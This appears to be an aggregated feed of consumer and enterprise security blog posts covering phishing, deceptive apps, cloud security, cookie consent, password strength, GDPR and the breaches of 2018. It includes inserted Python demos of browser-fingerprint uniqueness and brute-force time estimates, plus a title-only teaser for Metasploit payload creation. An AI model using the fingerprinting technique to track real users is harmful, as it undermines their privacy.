The ways in which hackers “phish” for new victims are many.

These include cloning websites that mimic legitimate exchange sites and distributing malicious crypto apps to steal personal information, including wallet credentials.

There are also bots that notify users about supposed issues with their crypto but are actually malicious and used to steal it, not to mention the use of Telegram to pose as ICO team members and ask users to invest by sending crypto to fraudulent addresses.

Another rising trend among scammers is bypassing 2FA by duping telecom companies into sending verification codes to the phone numbers of the scammers. This grants them access to authentication on crypto accounts and exchanges.

These types of social engineering tactics are highly prevalent. Taking extra precautions, whether you’re discussing, investing in, or transferring crypto, is absolutely necessary, as anyone can fall victim to classic phishing scams.

Conclusion

Unlike banks, which offer standard protections and insurance for customers, the blockchain cannot offer the same luxury to crypto holders.

Elements outside the blockchain make it difficult for companies and users of blockchain to remain entirely protected. Protecting these elements, namely crypto wallets and exchanges, is one of the biggest challenges in blockchain security.

A proper cyber defense strategy will seek to incorporate traditional solutions like using antivirus software and running malware scans, but it’s equally important to use common sense when dealing with anything crypto.

Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Tackling The Weaknesses Outside The Blockchain System To Protect Your Cryptocurrency appeared first on Cloudbric.

Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victim to deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app off your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blogs.

Thoughts on Cloud Security

Recently I've been reading about cloud security and security with respect to DevOps. I'll say more about the excellent book I'm reading, but I had a moment of déjà vu during one section.

The book described how cloud security is a big change from enterprise security because it relies less on IP-address-centric controls and more on users and groups. The book talked about creating security groups, and adding users to those groups in order to control their access and capabilities.

As I read that passage, it reminded me of a time long ago, in the late 1990s, when I was studying for the MCSE, then called the Microsoft Certified Systems Engineer. I read the book at left, Windows NT Security Handbook, published in 1996 by Tom Sheldon. It described the exact same security process of creating security groups and adding users. This was core to the new NT 4 role based access control (RBAC) implementation.

Now, fast forward a few years, or all the way to today, and consider the security challenges facing the majority of legacy enterprises: securing Windows assets and the data they store and access. How could this wonderful security model, based on decades of experience (from the 1960s and 1970s no less), have failed to work in operational environments?

There are many reasons one could cite, but I think the following are at least worthy of mention.

The systems enforcing the security model are exposed to intruders.

Furthermore:

Intruders are generally able to gain code execution on systems participating in the security model.

Finally:

Intruders have access to the network traffic which partially contains elements of the security model.

From these weaknesses, a large portion of the security countermeasures of the last two decades have been derived as compensating controls and visibility requirements.

The question then becomes:

Does this change with the cloud?

In brief, I believe the answer is largely "yes," thankfully. Generally, the systems upon which the security model is being enforced are not able to access the enforcement mechanism, thanks to the wonders of virtualization.

Should an intruder find a way to escape from their restricted cloud platform and gain hypervisor or management network access, then they find themselves in a situation similar to the average Windows domain network.

This realization puts a heavy burden on the cloud infrastructure operators. The major players are likely able to acquire and apply the expertise and resources to make their infrastructure far more resilient and survivable than their enterprise counterparts.

The weakness will likely be their personnel.

Once the compute and network components are sufficiently robust from externally sourced compromise, then internal threats become the next most cost-effective and return-producing vectors for dedicated intruders.

Is there anything users can do as they hand their compute and data assets to cloud operators?

I suggest four moves.

First, small- to mid-sized cloud infrastructure users will likely have to piggyback or free-ride on the initiatives and influence of the largest cloud customers, who have the clout and hopefully the expertise to hold the cloud operators responsible for the security of everyone's data.

Second, lawmakers may also need improved whistleblower protection for cloud employees who feel threatened by revealing material weaknesses they encounter while doing their jobs.

Third, government regulators will have to ensure no cloud provider assumes a monopoly, or no two providers assume a duopoly. We may end up with the three major players and a smattering of smaller ones, as is the case with many mature industries.

Fourth, users should use every means at their disposal to select cloud operators not only on their compute features, but on their security and visibility features. The more logging and visibility exposed by the cloud provider, the better. I am excited by new features like the Azure network tap and hope to see equivalent features in other cloud infrastructure.

Remember that security has two main functions: planning/resistance, to try to stop bad things from happening, and detection/response, to handle the failures that inevitably happen. "Prevention eventually fails" is one of my long-time mantras. We don't want prevention to fail silently in the cloud. We need ways to know that failure is happening so that we can plan and implement new resistance mechanisms, and then validate their effectiveness via detection and response.

Update: I forgot to mention that the material above assumed that the cloud users and operators made no unintentional configuration mistakes. If users or operators introduce exposures or vulnerabilities, then those will be the weaknesses that intruders exploit. We've already seen a lot of this happening and it appears to be the most common problem. Procedures and tools which constantly assess cloud configurations for exposures and vulnerabilities due to misconfiguration or poor practices are a fifth move which all involved should make.

A corollary is that complexity can drive problems. When the cloud infrastructure offers too many knobs to turn, then it's likely the users and operators will believe they are taking one action when in reality they are implementing another.

In da House (of Representatives)

Recently, the US Congress met to discuss privacy protections from the perspective of a federal regulation. One of the most discussed topics was GDPR and whether it works or not. A lot was said, and I was pretty disappointed with the overall lack of nuance with regards to understanding what privacy is about from sitting […]

The post In da House (of Representatives) appeared first on Privacy Ref Blog.

These Cookie Warning Shenanigans Have Got to Stop


This will be short, ranty and to the point: these warnings are getting ridiculous:


I know, tell you something you don't know! The whole ugly issue reared its head again on the weekend courtesy of the story in this tweet:

The reason I don't know if it makes it better or worse is that on the one hand, it's ridiculous that in a part of the world that's more privacy-focused than most it essentially boils down to "take this cookie or no access for you" whilst on the other hand, the Dutch DPA somehow thinks that this makes any sense to (almost) anyone:

And the Dutch DPA’s guidance makes it clear internet visitors must be asked for permission in advance for any tracking software to be placed — such as third-party tracking cookies; tracking pixels; and browser fingerprinting tech — and that that permission must be freely obtained. Ergo, a free choice must be offered.

Is this really what we want? To continue chucking up cookie warnings to everyone and somehow expecting them to make an informed decision about the risks they present? 99% of people are going to click through them anyway (note: this is a purely fabricated figure based on the common-sense assumption that people will generally click through anything that gets in the way of performing the task they set out to complete in the first place). And honestly, how on earth is your average person going to make an informed decision on a message like this:

Do you know how hard it is to explain OAuth to technical people, let alone the masses? Oh wait - it's not OAuth - it's Oath but even I didn't get that at first because nobody really reads these warnings anyway! And now that I have read it and I know it's Oath, what does that really mean? Oh look, a big blue button that will make it all go away and allow me to do what I came here for in the first place...

But say you are more privacy focused and you wanted to follow that link in the original tweet. Here's your fix:


And if you're smart enough to actually understand what cookies are and be able to make an informed decision when prompted with a warning like TechCrunch's, then you're smart enough to know how to right click on a link and open it incognito. Or run an ad blocker. Or something like a Pi-hole.

Or you move to Australia because apparently, we don't deserve the same levels or privacy down here. Or have I got that back to front and Europeans don't deserve the same slick UX experience as we get down here? You know, the one where you click on a link to read an article and you actually get to read the article!

So let's be European for a moment and see how that experience looks - let's VPN into Amsterdam and try to control my privacy on TechCrunch:


Are you fucking serious? This is what privacy looks like? That's 224 different ad networks that are considered "IAB Partners" (that'd be the Interactive Advertising Bureau) and I can control which individual ones can set cookies. And that's in addition to the 10 Oath foundational partners:


You can't disable any of those either by the look of it so yeah, no privacy on that front. But at least you can go and read their privacy policy, right? Sure, Unruly's is 3,967 words, Facebook's is 4,498 words and Zentrick's is another 3,805 words. Oh - and remember that you need to accept cookies on each one of those sites too and you're going to want to read about how they and their partners track you...


And the ridiculous thing about it is that tracking isn't entirely dependent on cookies anyway (and yes, I know the Dutch situation touched on browser fingerprinting in general too). Want to see a perfect example? Have a go of Am I Unique and you'll almost certainly be told that "Yes! You can be tracked!":


Over one million samples collected and yet somehow, I am a unique snowflake that can be identified across requests without a cookie in sight. How? Because even though I'm running the current version of Chrome on the current version of Windows, less than 0.1% of people have the same user agent string as me. Less than 0.1% of people also have their language settings the same as mine. Keep combining these unique attributes and you have a very unique fingerprint:


The list goes on well beyond that screen grab too - time zone, screen resolution and even the way the canvas element renders on the page. It's kinda cool in a kinda creepy way.
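The "keep combining attributes" point is easiest to see with numbers. The following is an added example (not from the post, and not data from Am I Unique) that takes a small constructed set of visitor profiles and measures, for one visitor, how many others share each attribute alone versus the whole combination, expressed both as an anonymity-set size and as bits of identifying information. The attribute names and sample values are constructed for the demonstration.

```python
import math

# Constructed sample of browser profiles (not real telemetry); each dict is one
# visitor's observable, cookie-free attributes. SAMPLES[0] is "me".
SAMPLES = [
    {"ua": "Chrome/72 Windows", "lang": "en-AU", "tz": "UTC+10", "res": "1920x1080"},
    {"ua": "Chrome/72 Windows", "lang": "en-US", "tz": "UTC-5", "res": "1920x1080"},
    {"ua": "Chrome/72 Windows", "lang": "en-AU", "tz": "UTC+10", "res": "1366x768"},
    {"ua": "Chrome/72 Windows", "lang": "en-US", "tz": "UTC+10", "res": "1920x1080"},
    {"ua": "Chrome/72 Windows", "lang": "en-GB", "tz": "UTC+0", "res": "1920x1080"},
    {"ua": "Firefox/65 Windows", "lang": "en-AU", "tz": "UTC+10", "res": "1920x1080"},
    {"ua": "Safari/12 macOS", "lang": "en-US", "tz": "UTC-8", "res": "2560x1600"},
    {"ua": "Firefox/65 Linux", "lang": "de-DE", "tz": "UTC+1", "res": "1366x768"},
]
ATTRS = ["ua", "lang", "tz", "res"]


def anonymity_set(samples, profile, attrs):
    """Number of sampled visitors indistinguishable from `profile` on `attrs`
    (the profile itself counts, so the minimum is 1)."""
    return sum(1 for s in samples if all(s[a] == profile[a] for a in attrs))


def identifying_bits(samples, profile, attrs):
    """Bits of identifying information the attribute set reveals: log2 of how
    much it shrinks the crowd. Equals log2(len(samples)) when the profile is unique."""
    return math.log2(len(samples) / anonymity_set(samples, profile, attrs))


def narrowing(samples, profile, attrs):
    """Anonymity-set size after each additional attribute, in the given order."""
    return [
        (attrs[i], anonymity_set(samples, profile, attrs[: i + 1]))
        for i in range(len(attrs))
    ]


def is_unique(samples, profile, attrs):
    """True when no other sampled visitor shares all of these attributes."""
    return anonymity_set(samples, profile, attrs) == 1


if __name__ == "__main__":
    me = SAMPLES[0]
    for a in ATTRS:
        print(f"{a:>4} alone: {anonymity_set(SAMPLES, me, [a])} of {len(SAMPLES)} share it")
    print("combined:", narrowing(SAMPLES, me, ATTRS))
    print("unique:", is_unique(SAMPLES, me, ATTRS),
          "bits:", identifying_bits(SAMPLES, me, ATTRS))
```

Each attribute on its own leaves "me" in a crowd of three to five, but the four together leave a crowd of one. Note also that time zone adds nothing once user agent and language are known, because the attributes are correlated; that is why real fingerprinting tools report the combined entropy rather than summing per-attribute figures.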

And here's the bit that really bugs me (ok, it all bugs me but this is the worst): how do we expect your normal everyday person to differentiate between cookie warnings and warnings like these:


I know what these are and you probably do too by virtue of being on this blog, but do you really think most people who have been conditioned to click through the warning that's sitting between them and the content they wish to read understand the difference between this and a cookie warning? We literally have banks telling people just to ignore these warnings:

So in summary, everyone clicks through cookie warnings anyway, if you read them you either can't understand what they're saying or the configuration of privacy settings is a nightmare, depending on where you are in the world you either don't get privacy or you don't get UX hell, if you understand the privacy risks then it's easy to open links incognito or use an ad blocker, you can still be tracked anyway and finally, the whole thing is just conditioning people to make bad security choices. That is all.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week; the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond'. Here is a recap of the points I made.

Cloud is the 'Default Model' for Business

Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes successful businesses continually crave. Indeed, the 'economies of scale' benefits are not just more cost-effective and more agile IT services, but also better cybersecurity (from the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business's cloud service migration, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given the board ultimately owns the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example with a PaaS model, the business is fully responsible for application deployment onto the cloud platform, and therefore the security of applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. The example of the 'shared' responsibility with this model, are the processes in providing and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.

A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversee the controls and processes through regular assessments.

5 Tips For Creating Bulletproof Passwords

While biometric tools like facial ID and fingerprints have become more common when it comes to securing our data and devices, strong passwords still play an essential part in safeguarding our digital lives.

This can be frustrating at times, since many of us have more accounts and passwords than we can possibly remember. This can lead us to dangerous password practices, such as choosing short and familiar passwords, and repeating them across numerous accounts. But password safety doesn’t have to be so hard. Here are some essential tips for creating bulletproof passwords.

Remember, simple is not safe

Every year surveys find that the most popular passwords are as simple as “1234567” and just “password.” This is great news for the cybercrooks, but really bad news for the safety of our personal and financial information.

When it comes to creating strong passwords, length and complexity matter because it makes them harder to guess, and harder to crack if the cybercriminal is using an algorithm to quickly process combinations. The alarming truth is that passwords that are just 7 characters long take less than a third of a second to crack using these “brute force attack” algorithms.

Tricks:

  • Make sure that your passwords are at least 12 characters long and include numbers, symbols, and upper and lowercase letters.
  • Try substituting numbers and symbols for letters, such as zero for “O”, or @ for “A”.
  • If you’re using internet-connected devices, like IP cameras and interactive speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

Keep it impersonal

Passwords that include bits of personal information, such as your name, address, or pet’s name, make them easier to guess. This is especially true when we share a lot of personal information online. But you can use personal preferences that aren’t well known to create strong passphrases.

Tricks:

  • Try making your password a phrase, with random numbers and characters. For instance, if you love crime novels you might pick the phrase: ILoveBooksOnCrime
    Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as: 1L0VEBook$oNcRIM3!
  • If you do need to use personal information when setting up security questions, choose answers that are not easy to find online.
  • Keep all your passwords and passphrases private.
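The two sections above (length and complexity under "Remember, simple is not safe", and the passphrase substitution under "Keep it impersonal") rest on one piece of arithmetic: the number of guesses an attacker has to make. Here is an added example (not from the McAfee post) that estimates the keyspace and worst-case guessing time of a password from its length and character classes, short-circuits anything on a common-password list, and checks the post's own 12-character, all-classes rule. The guessing rate and the common-password list are assumptions made for the demonstration; the passphrases tested are the post's own.

```python
import math
import string

# Constructed stand-in for the "most popular passwords" lists that surveys report.
COMMON_PASSWORDS = {"password", "1234567", "12345678", "123456", "qwerty", "111111"}

# Assumed offline guessing rate (guesses per second) against a fast, unsalted
# hash on GPU hardware; the real figure depends on the hash and the attacker's kit.
GUESSES_PER_SECOND = 100_000_000_000


def character_classes(pw):
    """Which of the four classes the post lists appear in the password."""
    return {
        "lower": any(c.islower() for c in pw),
        "upper": any(c.isupper() for c in pw),
        "digit": any(c.isdigit() for c in pw),
        "symbol": any(c in string.punctuation for c in pw),
    }


def charset_size(pw):
    """Size of the alphabet a brute-force attacker must cover, given the
    classes the password actually uses (26 + 26 + 10 + 32 when all are present)."""
    classes = character_classes(pw)
    size = 0
    if classes["lower"]:
        size += 26
    if classes["upper"]:
        size += 26
    if classes["digit"]:
        size += 10
    if classes["symbol"]:
        size += len(string.punctuation)  # 32 ASCII symbols
    return size


def keyspace(pw):
    """Number of candidate passwords of this length over this alphabet."""
    return charset_size(pw) ** len(pw)


def worst_case_seconds(pw, rate=GUESSES_PER_SECOND):
    """Time to exhaust the keyspace at `rate`; zero for anything on the common
    list, because a wordlist attack tries those first."""
    if pw.lower() in COMMON_PASSWORDS:
        return 0.0
    return keyspace(pw) / rate


def meets_policy(pw):
    """The post's rule: at least 12 characters and all four character classes."""
    return len(pw) >= 12 and all(character_classes(pw).values())


def assess(pw):
    """Summary a signup form could show the user before accepting a password."""
    space = keyspace(pw)
    return {
        "length": len(pw),
        "charset": charset_size(pw),
        "entropy_bits": round(math.log2(space), 1) if space > 0 else 0,
        "worst_case_seconds": worst_case_seconds(pw),
        "meets_policy": meets_policy(pw),
        "common": pw.lower() in COMMON_PASSWORDS,
    }


if __name__ == "__main__":
    for pw in ["1234567", "abcdefg", "ILoveBooksOnCrime", "1L0VEBook$oNcRIM3!"]:
        print(pw, assess(pw))
```

Seven lowercase letters fall in well under a second at the assumed rate, the 17-character phrase `ILoveBooksOnCrime` already takes on the order of 10^18 seconds, and the substituted form `1L0VEBook$oNcRIM3!` is the only one of the four that satisfies the 12-character, all-classes rule. The estimate is a worst case for a blind brute force; dictionary and rule-based attacks will guess predictable phrases much faster, which is why the post also insists the phrase be impersonal.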

Never reuse passwords

If you reuse passwords and someone guesses a password for one account, they can potentially use it to get into others. This practice has gotten even riskier over the last several years, due to the high number of corporate data breaches. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts.

Tricks:

  • Use unique passwords for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. These too can be compromised, and if you use the same password for more sensitive accounts, they too are at risk.
  • If a website or monitoring service you use warns you that your details may have been exposed, change your password immediately.

Employ a password manager

If just the thought of creating and managing complex passwords has you overwhelmed, outsource the work to a password manager! These are software programs that can create random and complex passwords for each of your accounts, and store them securely. This means you don’t have to remember your passwords – you can simply rely on the password manager to enter them when needed.

Tricks:

  • Look for security software that includes a password manager
  • Make sure your password manager uses multi-factor authentication, meaning it uses multiple pieces of information to identify you, such as facial recognition, a fingerprint, and a password.

Boost your overall security

Now that you’ve made sure that your passwords are bulletproof, make sure you have comprehensive security software that can protect you from a wide variety of threats.

Tricks:

  • Keep your software up-to-date and consider using a web advisor that protects you from accidentally typing passwords into phishing sites.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post 5 Tips For Creating Bulletproof Passwords appeared first on McAfee Blogs.

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator (MSFPC)   Disclaimer Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of Hackingvision.com will not be […]

The post Create Metasploit Payload in Kali Linux MSFvenom Payload Creator appeared first on HackingVision.

Artificial Intelligence, Machine Learning and More at RSAC 2019

Last week, the RSA Conference painted San Francisco’s Moscone Center purple with the theme ‘Better’, and the cybersecurity industry did not disappoint in making the digital world a better and safer place. Below, we’re sharing a few McAfee highlights from this year’s event.

Behind the Scenes of MGM Resorts’ Digital Transformation at CSA Summit

In its tenth year at the RSA Conference, the CSA Summit welcomed Rajiv Gupta, Senior Vice President, Cloud Security Business Unit at McAfee, and Scott Howitt, Senior Vice President & Chief Information Security Officer at MGM Resorts International, to the stage. During the keynote, Howitt discussed MGM’s digital transformation and how adopting the cloud into MGM’s business model resulted in a modern experience for customers and more engaged and productive employees. We also heard Gupta share statistics from our Cloud Report on how cloud data distribution has changed dramatically, which now requires new and better solutions. Before attendees headed out for lunch, Howitt and Gupta closed the first half of the CSA Summit by underlining the positive impact the cloud can have on enterprise businesses.

Tapping into the Tremendous Power of Artificial Intelligence at RSAC

On Tuesday, SVP and Chief Technology Officer Steve Grobman and Chief Data Scientist Dr. Celeste Fralick took the main stage at RSAC. During their keynote, Grobman and Fralick discussed how the industry needs to think about artificial intelligence, its power, how it can be used against us and its adversarial uses. Fralick shared how “most people don’t realize how fragile AI and machine learning can really be” and described how her team works in a technical area called adversarial machine learning, where they study ways that adversaries can evade or poison machine learning classifiers. In closing, Grobman told RSA attendees that “we must embrace AI but never ignore its limitations. It’s just math. It’s fragile. And there is a cost to both false positives and false negatives.”

EXPO-nentially Better

This year’s RSAC expo didn’t disappoint, with over 400 exhibitors showcasing unique content from the world’s top cybersecurity minds and the latest security solutions. Every day our booth was full as we connected with our customers, partners, and prospects. At this year’s conference, we hosted a fun and interactive Capture the Flag challenge which tested the investigative and analytical skills of RSA attendees. Contestants were given various challenges and received “flag” details on how to complete each challenge as quickly and accurately as possible.

RSAC was full of announcements with new and better products along with the buzzing of cybersecurity professionals making better connections with peers from around the world, with the same goal of keeping the digital world safe and making the real world a better place.

The post Artificial Intelligence, Machine Learning and More at RSAC 2019 appeared first on McAfee Blogs.

CNIL’s Google Fine of 50 million Euros

The announcement from CNIL about their decision to fine Google provides valuable insight into the thinking of Supervisory Authorities when it comes to transparency (notice) and consent. Google’s vulnerability to the fine is attributed to the complexity of their privacy notice and terms of service. The information a user may wish to find was scattered […]

The post CNIL’s Google Fine of 50 million Euros appeared first on Privacy Ref Blog.

You Rang? New Voice Phishing Attack Tricks Unsuspecting Users

In this digital day and age, the average user is likely familiar with the techniques and avenues cybercriminals use to get ahold of personal data and money. With this knowledge, we’ve become smarter and keen to the tricks of the cybercrime trade. However, cybercriminals have become smarter too, and therefore their attacks have become more complex. Take phishing, for example. There has been a dramatic shift in phishing attacks, from simple and general to complex and personalized. What was once spoofing emails or websites has now evolved into something more devious – vishing, or voice phishing. This method involves a cybercriminal attempting to gain access to a victim’s personal or financial information by pretending to be a financial institution via phone call. And now a new vishing attack is proving to be more difficult to detect than the typical phishing scams.

In April 2018, Min-Chang Jang, a manager at Korea Financial Security Institute and Korea University, made a breakthrough in his investigation into malicious apps designed to intercept calls to users from legitimate numbers. This tactic puts a new but troubling twist on the original voice phishing cyberattack. To be successful in this venture, a hacker must first convince a user to download a fake app. To do this, a link is sent to the victim, luring them in with an amazing offer around loan refinancing or something similar, which then prompts the user to download the malicious app. If the target takes the bait, calls will start to come in from the financial institution following up on the possible loan refinancing offer. The call, however, isn’t connected to the actual financial company; rather, it is intercepted and connected to the bad actor.

We know that as we adjust to the world around us and become smarter about our security, cybercriminals will do the same with their thievery. Today it’s an advanced vishing attack, tomorrow it could be a different type of phishing vector. However, users can rest assured that companies like McAfee are working tirelessly to ensure our users can thwart any cyberattack that comes their way. While this voice phishing attack is hard to detect, here are some proactive steps you can take to ensure you don’t fall victim to cybercriminals’ schemes:

  • Only install apps from authorized sources. To avoid malicious apps getting ahold of your data, only download apps from authorized vendors. For Android users, use the Google Play Store. For iPhone users, use the Apple App Store. Never trust a third-party app with information that could be exploited in the wrong hands.
  • Turn on caller ID or other services. Numerous carriers now offer free services that notify users of possible scam calls. And a lot of phones come with call-identifying capabilities that can give the user a quick diagnostic of whether the call is legitimate or not. With this feature, users can report scam calls to a database too.
  • Always think twice. In addition to tips and apps, there’s no better judge than common sense so if an offer or deal sounds too good to be true, it most likely is.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post You Rang? New Voice Phishing Attack Tricks Unsuspecting Users appeared first on McAfee Blogs.

Security roundup: March 2019

We round up interesting research and reporting about security and privacy from around the web. This month: ransomware repercussions, reporting cybercrime, vulnerability volume, everyone’s noticing privacy, and feeling GDPR’s impact.

Ransom vs ruin

Hypothetical question: how long would your business hold out before paying to make a ransomware infection go away? For Apex Human Capital Management, a US payroll software company with hundreds of customers, it was less than three days. Apex confirmed the incident, but didn’t say how much it paid or reveal which strain of ransomware was involved.

Interestingly, the story suggests that the decision to pay was a consensus between the company and two external security firms. This could be because the ransomware also encrypted data at Apex’s newly minted external disaster recovery site. Most security experts strongly advise against paying extortionists to remove ransomware. With that in mind, here’s our guide to preventing ransomware. We also recommend visiting NoMoreRansom.org, which has information about infections and free decryption tools.

Bonus extra salutary security lesson: while we’re on the subject of backup failure, a “catastrophic” attack wiped the primary and backup systems of the secure email provider VFE Systems. Effectively, the lack of backup put the company out of business. As Brian Honan noted in the SANS newsletter, this case shows the impact of badly designed disaster recovery procedures.

Ready to report

If you’ve had a genuine security incident – neat segue alert! – you’ll probably need to report it to someone. That entity might be your local CERT (computer emergency response team), a regulator, or even law enforcement. (It’s called cybercrime for a reason, after all.) Security researcher Bart Blaze has developed a template for reporting a cybercrime incident which you might find useful. It’s free to download at Peerlyst (sign-in required).

By definition, a security incident will involve someone deliberately or accidentally taking advantage of a gap in an organisation’s defences. Help Net Security recently carried an op-ed arguing that it’s worth accepting that your network will be infiltrated or compromised. The key to recovering faster involves a shift in mindset and strategy from focusing on prevention to resilience. You can read the piece here. At BH Consulting, we’re big believers in the concept of resilience in security. We’ve blogged about it several times over the past year, including posts like this.

In incident response and in many aspects of security, communication will play a key role. So another helpful resource is this primer on communicating security subjects with non-experts, courtesy of SANS’ Lenny Zeltser. It takes a “plain English” approach to the subject and includes other links to help security professionals improve their messaging. Similarly, this post from Raconteur looks at language as the key to improving collaboration between a CISO and the board.

Old flaws in not-so-new bottles

More than 80 per cent of enterprise IT systems have at least one flaw listed on the Common Vulnerabilities and Exposures (CVE) list. One in five systems has more than ten such unpatched vulnerabilities. Those are some of the headline findings in the 2019 Vulnerability Statistics Report from Irish security company Edgescan.

Edgescan concluded that the average window of exposure for critical web application vulnerabilities is 69 days. Per the report, an average enterprise takes around 69 days to patch a critical vulnerability in its applications and 65 days to patch the same in its infrastructure layers. High-risk and medium-risk vulnerabilities in enterprise applications take up to 83 days and 74 days respectively to patch.

SC Magazine’s take was that many of the problems in the report come from companies lacking full visibility of all their IT assets. The full Edgescan report has even more data and conclusions and is free to download here.

From a shrug to a shun

Privacy practitioners take note: consumer attitudes to security breaches appear to be shifting at last. PCI Pal, a payment security company, found that 62 per cent of Americans and 44 per cent of Britons claim they will stop spending with a brand for several months following a hack or breach. The reputational hit from a security incident could be greater than the cost of repair. In a related story, security journalist Zack Whittaker has taken issue with the hollow promise of websites everywhere. You know the one: “We take your privacy seriously.”

If you notice this notice…

Notifications of data breaches have increased since GDPR came into force. The European Commission has revealed that companies made more than 41,000 data breach notifications in the six-month period since May 25. Individuals or organisations made more than 95,000 complaints, mostly relating to telemarketing, promotional emails and video surveillance. Help Net Security has a good writeup of the findings here.

It was a similar story in Ireland, where the Data Protection Commission saw a 70 per cent increase in reported valid data security breaches, and a 56 per cent increase in public complaints compared to 2017. The summary data is here and the full 104-page report is free to download.

Meanwhile, Brave, the privacy-focused browser developer, argues that GDPR doesn’t make doing business harder for a small company. “In fact, if purpose limitation is enforced, GDPR levels the playing field versus large digital players,” said chief policy officer Johnny Ryan.

Interesting footnote: a US insurance company, Coalition, has begun offering GDPR-specific coverage. Dark Reading quotes a lawyer who said insurance might be effective for risk transference but it’s untested. Much will depend on the policy’s wording, the lawyer said.

Things we liked

Lisa Forte’s excellent post draws parallels between online radicalisation and cybercrime. MORE

Want to do some malware analysis? Here’s how to set up a Windows VM for it. MORE

You give apps personal information. Then they tell Facebook (PAYWALL). MORE

Ever wondered how cybercriminals turn their digital gains into cold, hard cash? MORE

This 190-second video explains cybercrime to a layperson without using computers. MORE

Blaming the user for security failings is a dereliction of responsibility, argues Ira Winkler. MORE

Tips for improving cyber risk management. MORE

Here’s what happens when you set up an IoT camera as a honeypot. MORE

The post Security roundup: March 2019 appeared first on BH Consulting.

Learning from the Big Data Breaches of 2018

Guest article by Cybersecurity Professionals

What can we learn from the major data breaches of 2018?
2018 was a major year for cybersecurity. With the introduction of GDPR, the public’s awareness of their cyber identities has vastly increased – and the threat of vulnerability along with it. The Information Commissioner’s Office received an increased number of complaints this year and the news was filled with reports of multi-national and multi-millionaire businesses suffering dramatic breaches at the hand of cybercriminals.

2018 Data Breaches
Notable breaches last year include:

5. British Airways
The card details of 380,000 customers were left vulnerable after a hack affected bookings on BA’s website and app. The company insists that no customer’s card details have been used illegally but they are expected to suffer a major loss of money in revenue and fines as a result of the attack.

4. T-Mobile
Almost 2 million users had their personal data, including billing information and email addresses, accessed through an API by an international group of hackers last August.

3. Timehop
A vulnerability in the app’s cloud computing account meant that the names and contact details of 21 million users were affected on Timehop. The company assured users that memories were only shared on the day and deleted after, meaning that the hackers were not able to access their Facebook and Twitter history.

2. Facebook & Cambridge Analytica
One of the most sensationalised news stories of the last year: Facebook suffered a string of scandals after it was revealed that analytics firm Cambridge Analytica had used the Facebook profile data of 87 million users in an attempt to influence President Trump’s campaign and potentially aid the Vote Leave campaign in the UK-EU referendum.

1. Quora
After a “malicious third party” accessed Quora’s system, the account information, including passwords, names and email addresses, of 100 million users was compromised. The breach was discovered in November 2018.

GDPR
As the UK made the switch from the Data Protection Act to GDPR, businesses and internet users across the country suddenly became more aware of their internet identities and their rights pertaining to how businesses handled their information.

